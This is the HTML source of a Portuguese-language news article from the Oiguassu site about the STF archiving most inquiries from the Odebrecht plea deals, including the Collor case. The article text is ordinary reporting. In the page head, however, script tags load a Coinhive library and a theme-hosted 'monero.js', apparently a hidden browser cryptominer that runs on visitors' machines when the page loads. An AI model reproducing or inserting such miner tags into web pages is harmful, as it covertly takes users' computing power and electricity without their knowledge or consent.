

<!DOCTYPE html>
<html class="no-js" lang="pt-BR" prefix="og: http://ogp.me/ns#">
<head>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://oiguassu.com/xmlrpc.php" />
<title>STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT - Oiguassu</title>

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

<!-- This site is optimized with the Yoast SEO plugin v9.2.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT - Oiguassu" />
<meta property="og:description" content="Dois ex-executivos da Odebrecht relataram com detalhes à força-tarefa da Lava Jato como negociaram pessoalmente com o senador Fernando Collor (PROS-AL) o pagamento de R$..." />
<meta property="og:url" content="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/" />
<meta property="og:site_name" content="Oiguassu" />
<meta property="article:section" content="Brasil" />
<meta property="article:published_time" content="2019-08-26T10:07:55+00:00" />
<meta property="og:image" content="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0.jpg" />
<meta property="og:image:secure_url" content="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0.jpg" />
<meta property="og:image:width" content="932" />
<meta property="og:image:height" content="621" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="Dois ex-executivos da Odebrecht relataram com detalhes à força-tarefa da Lava Jato como negociaram pessoalmente com o senador Fernando Collor (PROS-AL) o pagamento de R$..." />
<meta name="twitter:title" content="STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT - Oiguassu" />
<meta name="twitter:image" content="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0.jpg" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/oiguassu.com\/","sameAs":[],"@id":"https:\/\/oiguassu.com\/#organization","name":"Oiguassu","logo":""}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Oiguassu &raquo;" href="https://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo;" href="https://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo; STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='gglcptch-css'  href='https://oiguassu.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.38' type='text/css' media='all' />
<link rel='stylesheet' id='mh-style-css'  href='https://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='https://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.8' type='text/css' media='all' />
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.10'></script>
<link rel='https://api.w.org/' href='https://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.10" />
<link rel='shortlink' href='https://wp.me/pS5BS-5bP' />
<link rel="alternate" type="application/json+oembed" href="https://oiguassu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Foiguassu.com%2Fstf-ja-arquivou-2-3-da-delacao-da-odebrecht%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://oiguassu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Foiguassu.com%2Fstf-ja-arquivou-2-3-da-delacao-da-odebrecht%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="https://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/amp/"><link rel="icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
</head>
<body class="post-template-default single single-post postid-19953 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="https://oiguassu.com/" title="Oiguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="https://oiguassu.com/wp-content/uploads/2018/05/cropped-b632f59c-2a6b-406a-bb6b-bd0031fe147b.jpg" height="427" width="1280" alt="Oiguassu" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="https://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="https://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-93"><a href="https://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="https://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="https://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="https://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="https://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/anp-interdita-dois-postos-de-gasolina-em-foz-e-quatro-bicos-de-bombas/" title="ANP INTERDITA DOIS POSTOS DE GASOLINA, EM FOZ, E QUATRO BICOS DE BOMBAS">
					<span class="ticker-item-date">agosto 26, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">ANP INTERDITA DOIS POSTOS DE GASOLINA, EM FOZ, E QUATRO BICOS DE BOMBAS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/governo-afirma-que-reformas-sao-essenciais-para-a-economia-e-empregos/" title="GOVERNO AFIRMA QUE REFORMAS SÃO ESSENCIAIS PARA A ECONOMIA E EMPREGOS">
					<span class="ticker-item-date">agosto 26, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">GOVERNO AFIRMA QUE REFORMAS SÃO ESSENCIAIS PARA A ECONOMIA E EMPREGOS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/" title="STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT">
					<span class="ticker-item-date">agosto 26, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/camara-pode-votar-nesta-semana-projeto-que-amplia-porte-de-armas/" title="CÂMARA PODE VOTAR NESTA SEMANA PROJETO QUE AMPLIA PORTE DE ARMAS">
					<span class="ticker-item-date">agosto 26, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CÂMARA PODE VOTAR NESTA SEMANA PROJETO QUE AMPLIA PORTE DE ARMAS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/mais-de-80-cidades-tem-manifestacoes-contra-lei-de-abuso-e-em-apoio-a-lava-jato/" title="MAIS DE 80 CIDADES TÊM MANIFESTAÇÕES CONTRA LEI DE ABUSO E EM APOIO À LAVA JATO">
					<span class="ticker-item-date">agosto 26, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">MAIS DE 80 CIDADES TÊM MANIFESTAÇÕES CONTRA LEI DE ABUSO E EM APOIO À LAVA JATO</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="https://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://oiguassu.com/category/brasil/" itemprop="url"><span itemprop="title">Brasil</span></a></span></nav>
<article id="post-19953" class="post-19953 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-777x437.jpg 777w, https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-120x67.jpg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="19954" data-permalink="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/aaghsk0/" data-orig-file="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0.jpg" data-orig-size="932,621" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="AAGhSk0" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0-300x200.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2019/08/AAGhSk0.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="https://oiguassu.com/author/admin/">admin</a></span>
<span class="entry-meta-date updated">agosto 26, 2019</span>
</p>
	<div class="entry-content clearfix">
		<h2 style="text-align: justify;">Dois ex-executivos da Odebrecht relataram com detalhes à força-tarefa da Lava Jato como negociaram pessoalmente com o senador Fernando Collor (PROS-AL) o pagamento de R$ 800 mil para a campanha dele ao governo de Alagoas em 2010 via caixa 2</h2>
<p style="text-align: justify;">Entregaram o plano de voo da aeronave com o qual foram de Salvador a Maceió e disseram que o encontro ocorreu no apartamento do próprio parlamentar no dia do aniversário dele: 12 de agosto. Essa história veio à tona em 2017, em meio à estrondosa delação da empreiteira. Na última semana, porém, teve um silente destino, cada vez mais comum entre os inquéritos que envolvem políticos com foro no Supremo Tribunal Federal (STF).</p>
<p style="text-align: justify;">Sem elementos adicionais que comprovassem a acusação feita pelos delatores da Odebrecht, a procuradora-geral da República, Raquel Dodge, arquivou há cinco dias o inquérito aberto há mais de dois anos para investigar Collor pelos crimes de corrupção ativa, passiva e lavagem de dinheiro, contrariando entendimento da Polícia Federal.</p>
<p style="text-align: justify;">“Diante desse cenário, a ausência de evidências de corroboração acerca da realização dos pagamentos tal como descrito pelos colaboradores, torna ainda mais carente de suporte probatório a versão trazida inicialmente”, escreveu Raquel na petição enviada ao ministro Luiz Fux, relator do inquérito que deve homologar ou não o arquivamento.</p>
<p style="text-align: justify;">O caso de Collor retrata o que tem sido a tônica das investigações decorrentes da delação da Odebrecht no Supremo. Levantamento feito pelo Estado nos autos dos inquéritos e das petições relacionadas ao acordo de colaboração premiada fechado pela empreiteira com o Ministério Público Federal (MPF) – e homologado pelo STF desde janeiro de 2017 – mostra que 54 dos 80 procedimentos que permaneceram sob a guarda dos ministros da Corte já foram arquivados (67%). Outros 24 inquéritos seguem em tramitação e dois já resultaram em ação penal.</p>
<p style="text-align: justify;">Escassez de provas é o motivo mais comum para que uma investigação vá para a gaveta. A própria PGR consta como solicitante do arquivamento de ao menos 28 inquéritos ou petições, sendo que nove foram feitas ainda na gestão do ex-procurador-geral Rodrigo Janot – que assinou o acordo com a Odebrecht – e 19 pela atual chefe do Ministério Público Federal.</p>
<p style="text-align: justify;">Alguns casos, como o deputado federal Roberto Freire (Cidadania-SP) e do senador Jarbas Vasconcelos (MDB-PE), por prescrição do crime apontado na delação. Mas a maioria (53%) por insuficiência de provas, quando os investigadores não conseguem reunir provas materiais do que foi delatado pelos colaboradores.<br />
Em maio deste ano, por exemplo, o ministro Ricardo Lewandowski arquivou, a pedido de Raquel Dodge, o inquérito que investigava a suspeita de caixa 2 nas campanhas da senadora Maria do Carmo Alves (DEM-SE) e do ex-senador Eduardo Amorim (PSDB-SE) em 2014. Na petição, a procuradora relatou que não havia como extrair novos elementos além dos depoimentos dos delatores e das planilhas da empreiteira porque os um dos intermediários da propina havia morrido e outro foi acometido de Alzheimer. A investigação pode ser reaberta caso surjam fatos novos.</p>
<p style="text-align: justify;">A carência de provas também foi justificativa para o arquivamento parcial do inquérito que investigava suposto pagamento de propina ao presidente da Câmara, Rodrigo Maia (DEM-RJ), ao senador Renan Calheiros (MDB-AL), e ao ex-senador Eunício Oliveira (MDB-CE) para aprovação de medidas provisórias no Congresso em 2009 e de doação via caixa 2 ao ministro da Casa Civil, Onyx Lorenzoni (DEM-RS), em 2006.</p>
<p style="text-align: justify;">Os políticos citados negam envolvimento em qualquer irregularidade ou crime relatado pelos colaboradores.</p>
<p style="text-align: justify;">Um advogado que trabalhou nos acordos de delação da Odebrecht e que aceitou falar com o Estado sob a condição de anonimato acredita que o índice de arquivamento dos casos ligados à construtora no Supremo se deve ao modelo de acordo usado pela PGR, que negociou a delação de 77 executivos do grupo ao mesmo tempo – o que dificultou uma análise mais apurada dos depoimentos e documentos dos colaboradores.</p>
<h2 style="text-align: justify;">Não foi possível confirmar muita coisa, diz advogado</h2>
<p style="text-align: justify;">Quando um acordo é fechado, o delator deve dizer quais provas pode oferecer para corroborar seus relatos. Somente depois da análise desse conjunto o Ministério Público pode dizer o que pode oferecer em troca daquela colaboração, observou o advogado. Segundo ele, como eram muitos os executivos envolvidos, a Procuradoria não teria conseguido avaliar corretamente todos os relatos fornecidos. Por isso, diz, “não foi possível confirmar muita coisa”.</p>
<p style="text-align: justify;">Um farto material comprobatório usado pela Lava Jato no caso Odebrecht só foi obtido depois da delação da empreiteira graças à colaboração de outros operadores do esquema, como o doleiro Álvaro José Novis, encarregado de coordenar os pagamentos aos políticos em São Paulo e no Rio, e um ex-gerente da transportadora de valores que fazia as entregas de dinheiro. Parte desse material, que contém planilhas e gravações telefônicas, só começou a chegar às mãos de muitos investigadores nos últimos meses.</p>
<p style="text-align: justify;">“Se a eficácia da colaboração depende de outra colaboração é sinal de que aquela delação não era válida. Ou seja, se os doleiros não tivessem delatado não teríamos prova. O instrumento não pode funcionar assim. A Odebrecht usava como prova da corrupção um sistema interno que no fundo não prova nada”, disse o criminalista Roberto Podval.</p>
<p style="text-align: justify;">A PGR destacou que “se durante a investigação não se obteve provas para demonstrar que o crime ocorreu ou quem o praticou, é dever do órgão da acusação, o Ministério Público, promover o arquivamento”.</p>
<p style="text-align: justify;">Afirmou ainda que em relação aos de acordos homologados pelo Supremo “há uma vasta variedade de situações” e “não há como se exigir que todos os supostos crimes relatados tenham viabilidade apuratória”. “Arquivamento não corresponde a insucesso de investigação, mas a uma atividade normal do Estado.”</p>
<p style="text-align: justify;">Ao todo, 320 procedimentos foram abertos a partir da delação da Odebrecht, mas 240 foram distribuídos para a Justiça Federal nos Estados por envolver pessoas sem prerrogativa de foro junto ao Supremo e para os Tribunais Eleitorais Regionais (TREs), porque estão relacionadas ao crime de caixa 2.</p>
<h2 style="text-align: justify;">Procuradora aponta outros objetivos das colaborações</h2>
<p style="text-align: justify;">Para a subprocuradora-geral da República Mônica Nicida, uma delação não pode ser medida só pelos total de inquéritos arquivados ou de denúncias dos investigados. “Um dos objetivos principais de um acordo de colaboração é revelar a estrutura, a hierarquia da organização criminosa a fim de desmontar sua estrutura. E nisso a confissão simples é diferente da delação”, disse a procuradora, que esteve a frente do processo de consolidação das normas do Ministério Público Federal para os acordos de leniência e de delação premiada – ela se aposentou há ano.</p>
<p style="text-align: justify;">Monica disse que é necessário verificar quantos dos arquivamentos aconteceram porque os crimes delatados eram antigos ou porque o tempo passado desde o delito tornou mais difícil obter provas que confirmassem as alegações dos colaboradores. Segundo ela, mesmo arquivado um caso pode ser importante para fundamentar pedidos de cooperação internacional e de recuperação de ativos desviados.</p>
<h6 style="text-align: right;">(Com MSN Notícias)</h6>
<p><img class="aligncenter size-medium" src="http://unifoz.edu.br/ProdutosIMG/7_1.jpg" width="800" height="756" /></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-19953" class="share-twitter sd-button share-icon no-text" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-19953" class="share-facebook sd-button share-icon no-text" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow noopener noreferrer" data-shared="sharing-google-19953" class="share-google-plus-1 sd-button share-icon no-text" href="https://oiguassu.com/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "STF JÁ ARQUIVOU 2/3 DA DELAÇÃO DA ODEBRECHT"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/stf-ja-arquivou-2-3-da-delacao-da-odebrecht/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="https://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><div class="gglcptch gglcptch_v2"><div id="gglcptch_recaptcha_1744273580" class="gglcptch_recaptcha"></div>
				<noscript>
					<div style="width: 302px;">
						<div style="width: 302px; height: 422px; position: relative;">
							<div style="width: 302px; height: 422px; position: absolute;">
								<iframe src="https://www.google.com/recaptcha/api/fallback?k=6LdS0nQUAAAAAAHCLnx2H4lhvCq8kBPHUe6TV0n1" frameborder="0" scrolling="no" style="width: 302px; height:422px; border-style: none;"></iframe>
							</div>
						</div>
						<div style="border-style: none; bottom: 12px; left: 25px; margin: 0px; padding: 0px; right: 25px; background: #f9f9f9; border: 1px solid #c1c1c1; border-radius: 3px; height: 60px; width: 300px;">
							<textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px !important; height: 40px !important; border: 1px solid #c1c1c1 !important; margin: 10px 25px !important; padding: 0px !important; resize: none !important;"></textarea>
						</div>
					</div>
				</noscript></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='19953' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="b49b21aeb7" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="61"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="https://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2019 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
